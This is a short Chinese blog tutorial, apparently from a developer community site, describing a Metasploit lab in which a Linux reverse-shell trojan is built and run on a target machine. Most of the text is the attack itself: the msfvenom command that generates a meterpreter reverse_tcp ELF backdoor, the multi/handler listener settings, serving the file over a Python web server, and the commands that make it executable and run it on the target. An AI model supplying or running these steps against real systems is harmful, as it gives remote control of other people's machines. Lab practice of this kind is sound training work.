Metasploit反弹shell.elf实验(linux)

一、环境准备

  1. MSF-Metasploit Framework

  2. 一台靶机

二、木马生成

  1. 生成一个Linux后门

  2. msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={监控IP} LPORT={监控端口} -f elf > shell.elf

三、配置监控

  1. 启动msf 终端内输入:msfconsole 启动msf

  2. 载入监控模块 msf中输入: use exploit/multi/handler

  3. 加载payload msf终端中输入:set payload linux/x64/meterpreter/reverse_tcp

  4. 配置payload msf终端中输入:show options

  5. 配置payload监控IP msf终端中输入: set lhost {监控IP}

  6. 配置payload监控端口 msf终端中输入:set lport {监控端口} (注意这里要和木马配置时使用的端口相同&如果使用内网穿透服务填写转发后的端口)

  7. 检查payload配置 msf终端中输入:show options

  8. 执行监控 msf终端中输入: run

四、攻击利用

  1. 将木马上传到靶机

    通过python创建一个简单web服务

    python2 -m SimpleHTTPServer 80

  2. 在靶机上执行木马

    赋权限 chmod 777 <文件名>

    chmod 777 shell.elf

    在文件目录下执行文件

    ./shell.elf

  3. 完成攻击利用

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

快乐的小猪v

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值